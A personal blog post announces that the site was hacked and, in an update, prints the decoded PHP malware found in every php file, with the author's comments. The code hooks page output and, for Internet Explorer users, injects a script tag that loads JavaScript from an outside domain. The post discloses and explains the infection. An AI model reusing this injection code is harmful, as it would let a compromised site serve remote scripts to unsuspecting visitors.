Well, it appears that some nasty spammer managed to add some JavaScript to the footer of this Blog, and so if you’ve accessed it recently using Internet Explorer you should make sure your anti-virus is up to date.
I’m still looking into what happened, and since we’re about to go offline for a week, I’ve temporarily hobbled the blog slightly to prevent the spam from showing. This means that some pages might not work quite as expected ( eg the where are we map). We’re still here and normal service will be resumed in a bit.
We’re very sorry for the inconvenience; we have no desire to have any advertising or whatnot pop up while you’re gracing us with your time!
Many thanks to Laura’s Dad for pointing this out, hopefully it won’t happen again
Update, September 22nd
So it turns out my hobbling above still didn’t fix the problem. I’ve finally cleared things out and all should now be fine. If anyone’s interested, it looks like we were hit by a variant of this: http://sucuri.net/malware/malware-entry-mwmrobh2
I’m still unclear on the infection route, but think it probably happened due to brute force guessing of our admin password, which has now been changed, along with everything else.
The problem code inserted a base64 encoded string to be evaluated in each php file, which evaluates as the following (comments added by me).
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no']))
{
$GLOBALS['mr_no']=1;
if(!function_exists('mrobh')){
if(!function_exists('gml')){
function gml(){
if (stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")
||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 7")
||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")
||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 9")){
return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9zd2VlcHN0YWtlc2FuZGNvbnRlc3Rzbm93LmNvbS9ubC5waHA/bm5uPTEiPjwvc2NyaXB0Pg==");
} return "";
}
// That <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1"></script>
// which is the suspect javascript
}
// This then sets the output buffer to rewrite each page and drop the above script just before
// the </body> tag. Cunning, especially with the gzdecode stuff.
if(!function_exists('gzdecode')){
function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){ $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1)); $RBE4C4D037E939226F65812885A53DAD9=10; $RA3D52E52A48936CDE0F5356BB08652F2=0; if($R30B2AB8DC1496D06B230A71D8962AF5D&4){ $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2)); $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1]; $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB; } if($R30B2AB8DC1496D06B230A71D8962AF5D&8){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&16){ $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1; } if($R30B2AB8DC1496D06B230A71D8962AF5D&2){ $RBE4C4D037E939226F65812885A53DAD9+=2; } $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9)); if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){ $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C; } return $R034AE2AB94F99CC81B389A1822DA3353; } } function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){ Header('Content-Encoding: none'); $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B); if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE); }else{ return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml(); } } ob_start('mrobh'); } }
(Ah, that brings back some memories of Slang from GS… Dynamic function definitions, oh yes)
Anyway, all should be good now. Hopefully we don’t get hacked again tonight!
Simon